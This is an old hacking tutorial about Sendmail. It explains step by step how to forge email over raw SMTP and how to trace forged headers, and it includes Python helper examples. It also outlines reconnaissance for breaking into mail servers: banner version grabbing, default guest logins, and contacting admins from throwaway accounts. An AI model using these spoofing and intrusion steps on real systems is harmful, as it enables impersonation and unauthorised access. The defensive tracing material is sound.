Contents
- Sendmail? Huh?
- What is Sendmail?
- What is it used for?
- Why would I want to learn about Sendmail?
How do I create authentic-looking fake mails?
- You mean I can send Emails from bgates@microsoft.com or bclinton@whitehouse.org?!
- Is it possible to create a 100% authentic Email?
- How can I learn raw Sendmail commands by myself?
- But what if I'm lazy? Can you pleeease teach me?
- How do I track down carelessly-made fake mails?
- How do I track down more sophisticated fake mails?
- Can I get caught?
- Will I get caught?
Hack the server? Through Sendmail?!
- Can I really hack a host that runs Sendmail?
- So why is Sendmail called "the buggiest daemon on Earth" anyway?
- Okay, great. Now how do I do it?
- Can you tell me more about various Sendmail security holes?
- Where can I find more Sendmail security holes?
- How can I tell what version of Sendmail the target host is running?
- Why should I care anyway?
- How can I use the BugTraq archives to find the holes I'm looking for?
- Can I get caught?
- Will I get caught?
- Final Notes
Okay, so I can hack a host which runs Sendmail. How do I do it?
* A Local DoS(29) in All Sendmail Versions Up to 8.9.3
* Bug in Sendmail's HELO command
* Giant Bug in Sendmail 8.8.4
* Final Notes
Newbies corner
- What is a daemon?
- What is a port?
- What is a service?
- What is a daemon banner?
- What is a timeout (in computer terms)?
- What is TCP and how does it work?
- What is UDP and how does it work?
- What is ICMP and how does it work?
- What is an IP address?
- What is a hostname?
- How to find out what your ISP's mail servers are?
- What is a portscanner?
- What is a services scanner?
- What/who is root?
- What is bandwidth?
- What is a client program?
- What is a DNS server?
- What is Telnet (the Telnet daemon and the Telnet program)?
- What is a command interpreter?
- What is a shell account?
- Who is a sysadmin?
- What is hyper text?
- What is an RFC?
- What is InterNIC?
- What is a sub domain (and how much does a domain really cost?)?
- What is SSH?
- What is a moderated mailing list / message board?
- What is a DoS attack?
- What is DUN?
- What is a dial-up account?
- What is a Unix password file?
- What is a thread?
Appendix A: Fake Daemons
- Fake Sendmail daemon
- Fake Telnet daemon
Appendix B: Routing Mail
- How can I route my mail?
- How would that help me?
Appendix C: Faking the sender's IP
- How can I fake my IP on the Email's header?
- Where can I read more about this kind of stuff?
Appendix D: Reply-to
- What does the Reply-to option do?
- How do I use it?
Appendix E: CC and BCC
- What do these commands do?
- How do I use them?
References
Bibliography
- Sam Spade's Library
- Various online magazines
- BugTraq's archives
- Packet Storm Security
- Security Focus
- Rootshell
- Hackersclub
Sendmail? Huh?
Sendmail is a daemon(1) which waits for connections on port(2) 25.
It is a mail transfer agent: it accepts mail over SMTP and either
delivers it locally or relays it on to the next server.
For example: your Email provider (probably your ISP (Internet
Service Provider)) probably uses two servers (unless it's a
web-based mail account such as Hotmail.com):
1) mail.boring-ISP.net (probably port 110, the POP3 port): for
incoming mail, i.e. the mailbox you download your messages from.
2) mailgw.boring-ISP.net (port 25, the SMTP port): for outgoing mail.
Most of the time mail servers look pretty much like this, but the
addresses vary between ISPs.
Mail.boring-ISP.net requires a username and a password so other
people won't be able to read your Emails, so let's skip this one (I
might discuss cracking those passwords in another tutorial, but
remember - I'm teaching you these things so you'll be able to know
how malicious crackers work and not fall for their tricks, not for
you to break the law and harm others). Now, as surprising as it may
sound, mailgw.boring-ISP.net will not require a password or any
other means of identification. If you telnet(19) into
mailgw.boring-ISP.net on port 25 and type in the right commands you
will be able to send fake mails. Interesting, huh?
(At the time of writing most ISP relays worked like this. Nowadays a
relay normally only accepts mail from its own network or after SMTP
authentication and answers "Relaying denied" to anyone else; the
commands below are the same either way.)
Now, the coolest part is that you can actually hack a server running
Sendmail or at least bring it down, since Sendmail has a long
history of bugs and security holes.
How can I create authentic-looking fake mails?
As mentioned in the previous chapter, sending mail does not require
you to have an account on the machine you're sending the mail from
(the mail server, not your computer). All you need to know is the IP
address(9) / hostname(10) of the mail server and the SMTP commands
Sendmail understands.
So far we assume that you know the IP/hostname of your target. If
you still don't know this important detail, please find out(11).
Now, let's get on with it. This time, unlike previous tutorials, I
will "learn" all over again how to do everything I
describe here and walk you through the entire process of learning
and using what you have learnt.
Alright, let's begin.
Our target outgoing mail server for today is mailgw.someone.com on
port 25.
First, let's telnet into that port. Do one of the following:
1) On a standard Unix text-based system, type 'telnet
mailgw.someone.com 25' (without the quotes).
2) On Windows, run C:\Windows\telnet.exe or your favorite telnet
application and type mailgw.someone.com in the host field and 25 in
the port field.
3) Under X Windows (a graphical interface for Unix; if you're smart
enough to be running some version of Unix you shouldn't have a hard
time finding one, and if you don't like the default telnet programs
you could always go to www.linuxberg.com and grab one), start your
favorite telnet application and type in the correct details (host
and port).
Note about VT: you might be asked to choose a terminal type during
the connection process. Something with VT and some number in it...
hmm...
VT is the name of DEC's series of video terminals (VT52, VT100,
VT220 etc'). Since there are several types of terminals (all sorts
of monitors, old printer terminals etc') you are asked to choose a
terminal type, so that the remote side knows which control codes
your screen understands. VT100 should suit most people just fine.
Note about shell accounts(21): if you're not running Unix and you
wish to use Unix tools on Unix systems while you work, telnet to
nether.net on port 23, login as newuser and get yourself a free
shell account. If you'd rather use Windows tools (I use Windows
stuff when I work from Windows, except in certain conditions when I
really NEED Unix and I don't want to reboot and boot it up. In that
case, I get myself a shell account so I am able to use Unix stuff
while working from Windows) go ahead (things will work faster since
the tools are actually located on your machine, not on some distant
computer which runs a shell account), but I still recommend that you
get a shell account at nether.net (in fact they teach you a lot of
great Unix-newbies stuff when you sign up).
Note about Telneting from Macintosh: Macintosh does not come with a
Telnet program. However, you can download one from: http://www.ncsa.uiuc.edu/SDG/Software/MacTelnet/
(thanks to little_v for this one!).
Now, let's see what we get after we telnet(19) to
mailgw.someone.com:25 (in this case, the character : stands for 'on
port', so mailgw.someone.com:25 means mailgw.someone.com on port
25).
220 alpha.someone.com ESMTP Sendmail 8.9.3/8.8.6; Thu, 8 Jul 1999 21:46:04 +0000 (GMT)
AHA! This is... this is... ugh... WHAT THE HELL IS THIS THING?!
This, my friends, is a daemon banner(4), and it just gave us tons of
valuable pieces of information!
Normally, this info is intended for a client program(16): the
"ESMTP" keyword tells it that it may send EHLO to ask which
extensions the server supports, and the version string lets it work
around the quirks of particular releases (a made-up example: if
every Sendmail version below 7.0.0 spelled some command 'halb'
instead of 'blah', the client could switch spellings after reading
the banner).
This daemon banner thing is also great for hackers and crackers,
since we can determine what version our target is running. Later,
when we will discuss about how to actually hack the server, this
data would be EXTREMELY valuable.
Okay, let's analyze what we've got...
220... a three-digit reply code. We'll find out what it means in a
moment...
alpha.someone.com... the name the server calls itself. Note that it
is not mailgw.someone.com, the name we connected to: one machine can
have several names, and mailgw may simply be an alias for alpha.
ESMTP... hmm... SMTP stands for Simple Mail Transfer Protocol. It is
the protocol(18) used by email clients and other mail servers to
talk to Sendmail daemons, and this is what we're trying to learn
right now. ESMTP is Extended SMTP. It's the same as SMTP, only it
contains some more commands (you get at them by saying EHLO instead
of HELO). Let's leave this alone for the time being.
Sendmail 8.9.3/8.8.6 - AHA! There's something interesting. We got
the version of the Sendmail daemon! The number before the slash is
the version of the sendmail binary, the one after it is the version
of its configuration file (sendmail.cf). Remember this, it will help
us during the next chapter (hacking into servers who run Sendmail).
The rest is the current date and time on the server, which is less
interesting (although it does tell you the server's time zone).
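Here is an added example, in Python, of reading the banner by program rather than by eye. It is my illustration, not code from the original tutorial and not Sendmail's own: it pulls the host name, the binary version and the config-file version out of a 220 line, and compares versions numerically, because the obvious string comparison would call 8.10.0 older than 8.9.3. Only the first banner line is the one quoted above; the other two are made up for the example.

```python
import re

# Constructed banner lines. The first is the one quoted in the text;
# the other two are made up to show a different version and a non-Sendmail server.
SAMPLE_BANNERS = [
    "220 alpha.someone.com ESMTP Sendmail 8.9.3/8.8.6; Thu, 8 Jul 1999 21:46:04 +0000 (GMT)",
    "220 mx.example.net ESMTP Sendmail 8.8.4/8.8.4; Mon, 5 Jan 1998 22:07:54 +0100",
    "220 relay.example.org ESMTP Postfix",
]

# 220, the server's name, optional "ESMTP", then "Sendmail <binary>/<cf>".
BANNER_RE = re.compile(
    r"^220[ -](?P<host>\S+)\s+(?P<esmtp>ESMTP\s+)?"
    r"Sendmail\s+(?P<bin>\d+(?:\.\d+)*)(?:/(?P<cf>[\w.]+))?"
)


def parse_banner(line):
    """Return host, ESMTP flag and both version strings, or None if it
    is not a Sendmail banner (the third sample above)."""
    m = BANNER_RE.match(line)
    if not m:
        return None
    return {
        "host": m.group("host"),
        "esmtp": m.group("esmtp") is not None,
        "binary_version": m.group("bin"),   # version of the sendmail binary
        "cf_version": m.group("cf"),        # version of its sendmail.cf
    }


def version_tuple(version):
    """'8.9.3' -> (8, 9, 3), so that comparisons are numeric per component."""
    return tuple(int(part) for part in version.split("."))


def older_than(version, reference):
    """True if `version` is an earlier release than `reference`.
    Comparing the raw strings would get 8.10.0 vs 8.9.3 wrong."""
    return version_tuple(version) < version_tuple(reference)


if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        info = parse_banner(banner)
        if info is None:
            print("not Sendmail:", banner)
        else:
            print(info["host"], info["binary_version"],
                  "older than 8.9.3" if older_than(info["binary_version"], "8.9.3") else "8.9.3 or newer")
```

Point the same parser at what you get back from a real port 25 connection and you have the version lookup key for the databases discussed in the next chapter.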
Okay, so let's move on... umm... how do I communicate with this
thing?
Er... let's try typing 'help' (without the quotes). Oh, by the way,
it is normal not to see what you type when you talk to Sendmail
since it won't send back your keystrokes. You have to turn on
"local echo" in your telnet program in order to see what
you type.
214-This is Sendmail version 8.9.3
214-Topics:
214- HELO EHLO MAIL RCPT DATA
214- RSET NOOP QUIT HELP VRFY
214- EXPN VERB ETRN DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214- sendmail-bugs@sendmail.org.
214-For local information send email to Postmaster at your site.
214 End of HELP info
Wee! This is cool!!
By this time you should have guessed that this number (the 220 in
the daemon banner and the 214 here) is actually a reply code. It
states the type of the reply you got, and each kind of reply (error
because of this, error because of that, help page for this,
confirmation message for that etc') has its own number. The first
digit is the important one: 2xx means the command succeeded, 3xx
means "go on, send more" (you'll meet 354 after DATA), 4xx is a
temporary failure (try again later) and 5xx is a permanent one (a
syntax error, an unknown command, a rejected recipient). 220 is
"service ready" and 214 is a help message.
Okay, let's move on. Let's try typing 'help helo'.
214-HELO <hostname>
214- Introduce yourself.
214 End of HELP info
See? I told you so. 214 is the
message type number for help messages.
Okay, so that way you can practically teach yourself what every
Sendmail command does. Stop right now, read all the help pages and
then continue. It is important that you learn how to learn things
by yourself. You might see some notes concerning the word RFC(24)
and some numbers. The RFCs themselves are published by the RFC
Editor at http://www.rfc-editor.org; the one describing SMTP is RFC
821, and RFC 1869 describes the ESMTP extensions.
Note about ESMTP: remember that ESMTP thing we came across? You'll
be able to get a good clue on what ESMTP is by reading the help
pages. Yes, I am trying to force you to read them... so please do.
They contain tons of great information for newbies as well as pros.
Okay, I'm assuming you've finished reading all those help pages. Now
let's move on.
First we need to enter a sender. We do this by typing 'MAIL FROM:
<fake Email address>' (remove the quotes and replace fake
Email address with the fake Email address of your choice, say...
bgates@microsoft.com (but leave the < and the >)).
The mail server should reply with this message:
250 bgates@microsoft.com... Sender ok
Next we type 'RCPT TO: <recipient>'. Replace recipient with
the target, say victim@victim.com. We should get
250 victim@victim.com... Recipient ok
You can add recipients by simply doing this command several times,
only with different recipients.
Now, let's move on to the message itself. Type 'data' to start
writing it.
354 Enter mail, end with "." on a line by itself
Now let's type in some stuff...
Subject: fake message (note about this line: in this line you get to
determine what subject you want to give your message. Header lines
like this one come first; leave one empty line after them, because
that empty line is what separates the headers from the body.)

Hello. This is a fake Email message.
I'm bored.
Gimme something to hack!!
.
Now we get this
250 CAA15313 Message accepted for delivery
You must be wondering right now what the heck that thing after the
250 is. This is the queue ID: the name Sendmail gives the message in
its queue and in its log file. The same ID turns up in the Received
and Message-ID headers of the delivered mail, which is what makes it
useful for tracing, so we'll get back to it later... don't you worry
your pretty head about it now.
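To see the whole exchange in one piece, here is an added example in Python. It is mine, not code from the original tutorial and not Sendmail's own: a toy responder that answers roughly the way Sendmail 8.9 does, plus a driver that plays the dialogue above against it. The peer hostname, IP address and queue ID are made up. The point is to show the reply code at each step, and that the Received line the 'server' stamps on the message is built from the connecting address, not from anything the client typed: HELO only sets the name in front of the parentheses, and leaving HELO out is what produces the X-Authentication-Warning discussed further down.

```python
# Toy SMTP responder modelled on Sendmail 8.9's replies (constructed example,
# not Sendmail code). Queue ID, server name and peer address are made up.
QUEUE_ID = "CAA15313"


class ToySmtpServer:
    def __init__(self, myname, peer_name, peer_ip):
        # peer_name/peer_ip stand for what a real server learns from the
        # TCP connection and reverse DNS, independent of what the client says.
        self.myname, self.peer_name, self.peer_ip = myname, peer_name, peer_ip
        self.helo = None
        self.sender, self.rcpts = None, []
        self.in_data, self.data_lines = False, []
        self.delivered = []  # accepted messages, as lists of lines

    def banner(self):
        return f"220 {self.myname} ESMTP Sendmail 8.9.3/8.8.6; Thu, 8 Jul 1999 21:46:04 +0000 (GMT)"

    def handle(self, line):
        """Return the reply for one client line (None while collecting the body)."""
        if self.in_data:
            if line == ".":
                self.in_data = False
                self.delivered.append(self._stamp(self.data_lines))
                self.data_lines, self.sender, self.rcpts = [], None, []
                return f"250 {QUEUE_ID} Message accepted for delivery"
            self.data_lines.append(line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.helo = arg.strip()
            # Greets with the REAL name and address, whatever was claimed.
            return f"250 {self.myname} Hello {self.peer_name} [{self.peer_ip}], pleased to meet you"
        if verb == "MAIL":
            self.sender = arg.partition(":")[2].strip().strip("<>")
            return f"250 {self.sender}... Sender ok"
        if verb == "RCPT":
            if self.sender is None:
                return "503 Need MAIL before RCPT"
            rcpt = arg.partition(":")[2].strip().strip("<>")
            self.rcpts.append(rcpt)
            return f"250 {rcpt}... Recipient ok"
        if verb == "DATA":
            if not self.rcpts:
                return "503 Need RCPT (recipient)"
            self.in_data = True
            return '354 Enter mail, end with "." on a line by itself'
        if verb == "QUIT":
            return f"221 {self.myname} closing connection"
        return f'500 Command unrecognized: "{line}"'

    def _stamp(self, body):
        """Prepend the trace headers a receiving server adds."""
        claimed = self.helo or self.peer_name
        received = (f"Received: from {claimed} ({self.peer_name} [{self.peer_ip}])"
                    f" by {self.myname} (8.9.3/8.8.6) with SMTP id {QUEUE_ID}")
        headers = [received]
        if self.helo is None:
            headers.append(f"X-Authentication-Warning: {self.myname}: "
                           f"{self.peer_name} [{self.peer_ip}] didn't use HELO protocol")
        return headers + list(body)


def run_session(server, client_lines):
    """Play a client script against the toy server; return [(who, text), ...]."""
    transcript = [("S", server.banner())]
    for line in client_lines:
        transcript.append(("C", line))
        reply = server.handle(line)
        if reply is not None:
            transcript.append(("S", reply))
    return transcript


def reply_class(reply):
    """First digit of a reply: 2 ok, 3 send more, 4 temporary failure, 5 permanent failure."""
    return int(reply[0])


if __name__ == "__main__":
    srv = ToySmtpServer("alpha.someone.com", "some.hostname.crap.com", "62.0.146.225")
    script = ["MAIL FROM: <bgates@microsoft.com>", "RCPT TO: <victim@victim.com>", "DATA",
              "Subject: fake message", "", "Hello. This is a fake Email message.", ".", "QUIT"]
    for who, text in run_session(srv, script):
        print(who, text)
    print("\n".join(srv.delivered[0]))
```

Run it once as above and once with a "HELO microsoft.com" line at the front of the script: the warning header disappears, but the Received line still carries some.hostname.crap.com and 62.0.146.225, which is the whole story of the next few sections.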
Now, if you were the recipient you would have got a 100%
authentic-looking fake mail. OR IS IT?
Let's take a look at what the recipient would get...
Hmm... welp, looks like an ordinary message to me. At least it does
to the ordinary user.
Now let's look at the headers.
Headers are a couple of lines which come with every Email message.
Most of today's Email clients show only the simpler parts of the
header (sender, subject, date and time etc'), but right now we need
the full header.
On Netscape Messenger displaying the full headers is done by going
to View ==> Headers ==> All.
On Eudora this is done by clicking on the button which displays the
"blah blah blah" caption when you put your mouse cursor
above it for a second or two.
Compuserve automatically displays the full header.
On Outlook, right click the message in your inbox, choose Properties
and then Details.
On pine, you should have an option somewhere in the configuration
screens that lets you choose what kind of header you want to view
(full or brief).
Now let's take a look at the full header, shall we?
Received: from alpha.someone.com (alpha.someone.com [194.90.1.13])
by cmx.someone.com (8.9.3/8.9.3) with ESMTP id CAA16970 for
<victim@victim.com>; Sat, 10 Jul 1999 02:49:59 +0000 (GMT)
From: bgates@microsoft.com
Received: from some.hostname.crap.com (some.hostname.crap.com
[62.0.146.225]) by alpha.someone.com (8.9.3/8.8.6) with SMTP id
CAA15313 for victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Date: Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Message-ID: <199907092355.CAA15313@alpha.someone.com>
X-Authentication-Warning: alpha.someone.com: some.hostname.crap.com
[62.0.146.225] didn't use HELO protocol
Subject: Fake mail
Status:
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: 3752da3b000002ff
Yeehaw! Look at all those numbers and letters and shiny things!
Let's start from the top, shall we?
Received: from alpha.someone.com (alpha.someone.com [194.90.1.13])
by cmx.someone.com (8.9.3/8.9.3) with ESMTP id CAA16970 for
<victim@victim.com>; Sat, 10 Jul 1999 02:49:59 +0000 (GMT)
Okay, so the mail was received from alpha.someone.com (alpha.someone.com
[194.90.1.13]). What does that mean?
A quick checkup on InterNIC(25)'s databases (type 'whois
someone.com' without the quotes on a Unix system or download
SamSpade for Windows at www.samspade.org) reveals that the domain is
owned by someone.com. This is probably one of the machines they use
to pass mail around internally. Let's leave it alone, it's not
important to us right now. The (alpha.someone.com [194.90.1.13])
part shows you the hostname(10) and the IP address(9) of the machine
this hop received the Email from, as seen by cmx.someone.com: the
name in front of the parentheses is what the sending machine claimed
to be, the name and address inside them are what cmx found out for
itself from the connection.
Ooh, ooh, wait! Wasn't the mail supposed to be sent from
microsoft.com? I mean, the sender is bgates@microsoft.com!
If we did the mail forging thing on microsoft.com instead of on
someone.com this wouldn't have happened, now would it? It would have
seemed like an ordinary Email... from Bill Gates... well, at least
so far.
Anyway, the rest is just the queue ID (which we will get to later)
and the date of the message (the receiving date) according to the
server which added the line. The +0000 (GMT) part means that this
server's clock is on Greenwich time. If it said, for example, +0200,
that time zone's time would be Greenwich time plus 2 hours. Find out
your own time zone first so you'll be able to convert and find out
when the message was sent in your time.
Now, on to more important things.
From: bgates@microsoft.com
Well, I guess this line is obvious... let's move on.
Received: from some.hostname.crap.com (some.hostname.crap.com
[62.0.146.225]) by alpha.someone.com (8.9.3/8.8.6) with SMTP id
CAA15313 for victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Okay, now this is really interesting. Now we get the sender's
hostname and IP address.
Note about the hostname: a dial-up(31) user will have a long and
twisted hostname. For example: my hostname right now (at least when
I was writing these lines) is RAS4-p97.hfa.netvision.net.il.
Netvision.net.il is my ISP, and the rest is mostly crap (pay close
attention to the hfa thing. Hfa stands for Haifa, which is my home
town. It means that I'm connected through Netvision's Haifa server.
See? Hostnames can be interesting).
You must have noticed by now that the hostname we got is certainly
not from microsoft.com, and that the mail server which sent this
isn't exactly microsoft.com or a Microsoft sub-domain(26) either,
which clearly shows that this Email is completely fake.
Another note about the hostname: sometimes you might not get a
hostname, but you will always get an IP address. You can find the
IP's hostname (most IP addresses do have a hostname) by doing 'nslookup
ip-address' (or 'host ip-address') without the quotes on a Unix
system or going to http://www.samspade.org and using their DNS(17)
Lookup Tool. If you still can't get it, try doing a whois on the IP
address; that at least tells you which network it belongs to.
To overcome this problem, you would need to do both of these things:
1) Send this mail through Microsoft's own mail server, so that the
"by" part of the Received line is a Microsoft machine.
2) Send this mail from a computer that is connected to the net
through Microsoft, so that the "from" part is a Microsoft machine
too. If you can't get one, it will clearly show in the headers that
the mail wasn't sent from Microsoft.
Note: nice trick to pull on someone: if your ISP is blah.com, you
can send your friends an Email from admin@blah.com which will look
100% authentic, because both the sending machine and the mail server
really are blah.com's!
Anyway, the next few characters give us the queue ID, as well as
other pieces of info. I promised we'll get to the queue ID, didn't I?
If you think someone is trying to trick you into thinking he's
somebody else, send an Email to abuse@your.ISP.com, to the abuse
address of the network the connecting machine belongs to (in this
case crap.com, not microsoft.com: the From line is the forged part),
or to the abuse address of the server which logged the queue ID.
To know which server that is, we'll need to skip a few lines (two
lines actually - time and date) and get straight to this:
Message-ID: <199907092355.CAA15313@alpha.someone.com>
Aha! Look at these interesting numbers! And check this out:
CAA15313@alpha.someone.com! The server that first accepted the
message builds the Message-ID from the date (1999-07-09, 23:55 GMT),
its queue ID and its own name, so alpha.someone.com is where the log
entry for queue ID CAA15313 lives (and that log records which IP
connected, even if the headers had been mangled). Let's send an
Email to abuse@someone.com (RFC 2142 reserves the abuse mailbox at
the domain for exactly this) and tell them that we think we received
a fake mail, and include the entire header. Next thing we'll do the
same with the ISP of the sender (in our case, the sender is
some.hostname.crap.com [62.0.146.225], meaning his ISP is probably
crap.com).
Now, on to the next line:
X-Authentication-Warning: alpha.someone.com: some.hostname.crap.com
[62.0.146.225] didn't use HELO protocol
Damn! I knew we forgot something! Now let's do it all over again,
but this time we'll type HELO microsoft.com at the beginning.
HELO microsoft.com
We get this:
250 alpha.someone.com Hello some.hostname.crap.com
[62.0.146.225], pleased to meet you
Notice that the server greets us by our real hostname and IP no
matter what we claimed in HELO: it gets those from the connection
itself, not from us.
The rest is exactly like the last time (sender, rcpt to, etc'
etc'). Now let's see what victim@victim.com would have gotten.
Aha! No X-Authentication-Warning! The Received line does change
though: it now reads 'from microsoft.com (some.hostname.crap.com
[62.0.146.225]) by alpha.someone.com ...', i.e. the name we claimed
is recorded right next to the real one, so anyone who reads the
whole line still sees where the mail came from. (A Sendmail compiled
with PICKY_HELO_CHECK, the option described in the next chapter,
adds an X-Authentication-Warning about that mismatch as well.)
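The tracing done by hand above can be scripted. The following is an added example in Python, mine and not part of the original tutorial: it unfolds a header block, walks the Received lines from the last one (the first hop) backwards, and flags the three things we just looked for: a HELO name that disagrees with the reverse DNS name next to it, a From: domain that is not where the message entered the mail system, and any X-Authentication-Warning. It also flags a first hop that has no [ip] part at all, which is the symptom of the overlong-HELO bug quoted in the next chapter. The first header block is constructed from the example above after the HELO retry; the second mimics the cropped header from that bug report.

```python
import re

# Constructed header block, modelled on the example traced above after the
# HELO retry. Not a real capture.
SAMPLE_HEADERS = """\
Received: from alpha.someone.com (alpha.someone.com [194.90.1.13])
\tby cmx.someone.com (8.9.3/8.9.3) with ESMTP id CAA16970
\tfor <victim@victim.com>; Sat, 10 Jul 1999 02:49:59 +0000 (GMT)
From: bgates@microsoft.com
Received: from microsoft.com (some.hostname.crap.com [62.0.146.225])
\tby alpha.someone.com (8.9.3/8.8.6) with SMTP id CAA15313
\tfor victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Date: Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Message-ID: <199907092355.CAA15313@alpha.someone.com>
Subject: Fake mail
"""

# Second constructed sample: what the overlong-HELO bug in the next chapter
# leaves behind (the Received line has no "(name [ip])" part).
CROPPED_HEADERS = """\
Received: from xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Date: Mon, 5 Jan 1998 22:08:52 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>
"""


def unfold(header_text):
    """Join RFC 822 continuation lines (leading whitespace) onto their header."""
    out = []
    for line in header_text.splitlines():
        if line[:1] in (" ", "\t") and out:
            out[-1] += " " + line.strip()
        else:
            out.append(line)
    return out


def parse_received(value):
    """Pick the interesting fields out of one unfolded Received: value."""
    hop = {"claimed": None, "reverse": None, "ip": None, "by": None, "id": None}
    m = re.match(r"from\s+(\S+)", value)                        # HELO name, as claimed
    if m:
        hop["claimed"] = m.group(1)
    m = re.search(r"\(([^\s\[\]()]*)\s*\[([^\]]+)\]\)", value)  # (reverse-dns [ip])
    if m:
        hop["reverse"] = m.group(1) or None
        hop["ip"] = m.group(2)
    m = re.search(r"\bby\s+(\S+)", value)                       # server that wrote the line
    if m:
        hop["by"] = m.group(1)
    m = re.search(r"\bid\s+([A-Za-z0-9]+)", value)              # its queue ID
    if m:
        hop["id"] = m.group(1)
    return hop


def trace(header_text):
    """Return (hops in delivery order, findings worth a second look)."""
    lines = unfold(header_text)
    received = [l.partition(":")[2].strip() for l in lines
                if l.lower().startswith("received:")]
    # Each server prepends its own Received: line, so the LAST one is the first hop.
    hops = [parse_received(v) for v in reversed(received)]
    if not hops:
        return hops, ["no Received: lines at all"]
    origin, findings = hops[0], []
    if origin["ip"] is None:
        findings.append("first hop has no [ip] part: origin not recorded "
                        "(overlong HELO? ask %s for its log)"
                        % (origin["by"] or "the receiving server"))
    elif origin["reverse"] and origin["claimed"].lower() != origin["reverse"].lower():
        findings.append("HELO name %r does not match reverse DNS %r"
                        % (origin["claimed"], origin["reverse"]))
    for l in lines:
        if l.lower().startswith("x-authentication-warning:"):
            findings.append("server warned: " + l.partition(":")[2].strip())
    from_line = next((l for l in lines if l.lower().startswith("from:")), "")
    m = re.search(r"@([\w.-]+)", from_line)
    if m and origin["reverse"]:
        from_dom, rev = m.group(1).lower(), origin["reverse"].lower()
        if rev != from_dom and not rev.endswith("." + from_dom):
            findings.append("From: says %s but the mail entered from %s [%s]"
                            % (from_dom, rev, origin["ip"]))
    return hops, findings


if __name__ == "__main__":
    for sample in (SAMPLE_HEADERS, CROPPED_HEADERS):
        hops, findings = trace(sample)
        for n, hop in enumerate(hops, 1):
            print("hop %d: %s" % (n, hop))
        for f in findings:
            print("  !", f)
```

The first hop's "by" server and queue ID are exactly what you put in the complaint to abuse@: that server's log line for the queue ID names the connecting IP even when the headers have been stripped of it.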
Final notes
I hope you enjoyed this chapter. Now you've learnt how to play
harmless and legal tricks on your friends, how to spot and trace
fake mails and how easy it is to catch you if you're trying to do
illegal stuff.
Oh, and by the way, there is a way to hide your IP/hostname when
faking mail... for more information, read the second section in the
'Okay, so I can hack a host which runs Sendmail. How do I do it?'
chapter.
Hack the server? Through Sendmail?!
Yeah, sure, why not? I mean, EVERY service(3) is vulnerable to some
attacks. That's why it is recommended to run as few services as
possible on your computer.
But the most vulnerable one is Sendmail (this is why it is called
'the buggiest daemon on Earth' or 'the buggiest daemon on the
planet'). A member of the mailing list once told me that he just
can't wait to read the Sendmail Tutorial (this was before this
tutorial has been released) and that he himself runs Sendmail on his
computer. Running Sendmail on a personal computer is unnecessary and
dangerous. If your computer does not act as a mail server, there is
no reason for you to run Sendmail (unless you want people to be able
to send mail to your-account@your.IP.address instead of
your-account@your.ISP.com. Note about your-account: in the first
address, your-account is the name of your username on your own
computer (Unix users should know what I am talking about). In the
second address, your-account is your username at your ISP).
Note: the information in this chapter can be either used to hack
servers, or the other way around - to protect your server. Please
don't break the law, or at least don't spew out my name during the
investigations... hehe...
Okay, so the first thing we have to do in order to hack a server
through a specific service (or to improve the security of a specific
server) is to find out the service's version. This can be easily
done by viewing the daemon banner(4). Suppose we came across a
computer that runs Sendmail 8.8.3 (which was quite old when this
tutorial was written, meaning there should be a couple of bugs
here. Most Sendmail point releases exist to fix a security hole or
some other bug, so an old version number usually means a list of
known holes to look up).
Next thing we'll try to determine the OS (Operating System) which
this daemon runs on. If Sendmail's banner won't tell us, the
Telnet(19) daemon might. First telnet to port 23 and cross your
fingers. If there's a daemon on that port, it's probably the Telnet
daemon, and its login banner will often give you the name and
version of the OS.
If not, you can either:
1) Try looking for a guest account (username: guest, password: guest
or username: newuser, password: newuser), since some systems give
you these details only after you log in.
2) Email admin@your-target.com and ask him (I recommend opening a
mailbox on one of those free mailbox services such as Hotmail and
Emailing him from there, since some admins(22) might get a little
suspicious...).
3) Try going to your target's website. This kind of information
might be there, somewhere.
If you still didn't find the OS, fear not! We might still be able to
do a cool hack without this information, but it might come in handy,
so do all you can to get your hands on it.
Next thing, you browse some online databases until you find the hole
you've been looking for. First of all I'll explain about the largest
and most recommended online databases, and then I'll teach you how
to search them, plus some valuable concepts and words you need to
get familiar with.
Packet Storm Security
URL: http://packetstorm.securify.com.
One of the largest online databases for security-related
information. I recommend going there once a day and reading the 'New
Files Today' section, whether you're looking for specific holes or
not.
The archive was founded by Ken Williams and gets hundreds of
thousands of hits per week.
It has recently been transferred into the ownership of Kroll-O'Gara
(www.securify.com).
Security Focus
URL: http://www.securityfocus.com.
Another comprehensive database. Updated daily. These guys never
sleep!
BugTraq
URL: hosted by Security Focus (http://www.securityfocus.com),
previously hosted by Netspace (http://www.netspace.org).
BugTraq is one of the best security mailing lists out there. The
list is moderated, meaning that if you find a new security hole, you
can only send your message to the moderator, Aleph1
(aleph1@underground.org). Aleph1 filters out all the spam, lame
messages and old bugs and posts only the good ones to the list.
I recommend signing up at http://www.securityfocus.com. You can also
search their archive, which is by the way my favorite
security-related database, by going to securityfocus.com and looking
for a link called 'search'.
Searching
If we are looking for a bug in Sendmail 8.8.3, we'll need to type
the following search keywords: 'sendmail 8.8.3' (without the
quotes). If we're looking for something specific, such as a local
DoS(29) attack against any version of sendmail, we will use the
following search keywords: 'local DoS sendmail', etc'.
Searching Packet Storm
Packet Storm should have a search box somewhere (Ken changes the
layout every now and then so I can't give you the exact location of
the box). You can divide the search results you will get into two
categories: texts and programs.
For example: you searched for a specific hole and you got a couple
of text files and a couple of programs. The text files explain the
bug and how to exploit it, while the programs use the hole to get
in.
These programs are often called 'exploits' and usually come as
source code instead of as a binary file. Let me explain: a binary
file is any file that isn't made of text. Executable files are
usually binary files. Now, in our case, programs come as sources
instead of binaries. Sources are in the form of plain text, and
they're actually a bunch of commands. When given to a compiler, this
source code turns into an executable binary (except for source code
written in an interpreted language such as Perl, which is run
straight from the source if you have the interpreter installed).
Anyway, these programs come in the form of sources so you will be
able to understand how they work instead of blindly running them
(and do read them before you compile them: an 'exploit' from an
unknown source can just as easily be aimed at you).
Searching Security Focus
Security Focus offers more organized information. Instead of various
bits of information, Security Focus offers articles. These include
